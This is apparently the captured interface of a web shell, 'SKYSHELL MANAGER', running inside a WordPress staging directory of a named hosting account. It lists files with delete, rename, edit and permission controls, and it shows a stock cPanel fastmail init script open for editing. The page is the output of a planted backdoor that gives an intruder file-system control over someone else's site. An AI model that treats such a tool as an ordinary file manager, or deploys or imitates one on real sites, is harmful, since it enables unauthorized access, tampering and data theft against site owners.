📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: fastmail
#!/bin/bash # # fastmail Start Fast Mail # # Author: cPanel, Inc. <copyright@cpanel.net> # # chkconfig: 345 05 10 # description: This is the fastmail service # Source function library. if [ -f /etc/init.d/functions ]; then . /etc/init.d/functions else echo "Could not find functions file, your system may be broken" exit 1 fi [ -f /usr/local/cpanel/scripts/fastmail ] || exit 0 LANG=C RETVAL=0 # See how we were called. case "$1" in start) umask 0022 echo -n "Starting fastmail: " daemon /usr/local/cpanel/scripts/fastmail --auto echo ;; stop) action "fastmail cannot be stopped: " echo ;; status) status init ;; restart) $0 stop $0 start ;; *) echo "Usage: $0 {start|stop|status|restart}" exit 1 esac exit
Save